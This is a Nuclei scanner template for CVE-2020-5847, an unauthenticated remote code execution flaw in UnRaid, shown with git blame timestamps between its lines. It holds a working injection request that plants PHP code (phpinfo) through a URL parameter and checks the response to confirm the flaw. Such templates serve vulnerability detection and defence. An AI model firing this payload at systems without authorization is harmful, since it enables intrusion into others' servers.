nuclei-templates/cves/2020/CVE-2020-5847.yaml

25 lines
713 B
YAML
Raw Normal View History

2021-02-14 20:52:26 +00:00
id: CVE-2020-5847
info:
2021-02-15 19:05:52 +00:00
name: UnRaid Remote Code Execution
2021-02-14 20:52:26 +00:00
author: madrobot
severity: high
2021-03-18 13:31:46 +00:00
description: A vulnerability in UnRaid allows remote unauthenticated attackers to execute arbirary code.
2021-02-14 20:52:26 +00:00
reference: https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/
2021-02-15 19:05:52 +00:00
tags: cve,cve2020,rce
2021-02-14 20:52:26 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20phpinfo();%20?%3E"
2021-02-15 19:05:52 +00:00
2021-02-14 20:52:26 +00:00
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
2021-02-15 19:05:52 +00:00
- "PHP Extension"
- "PHP Version"
condition: and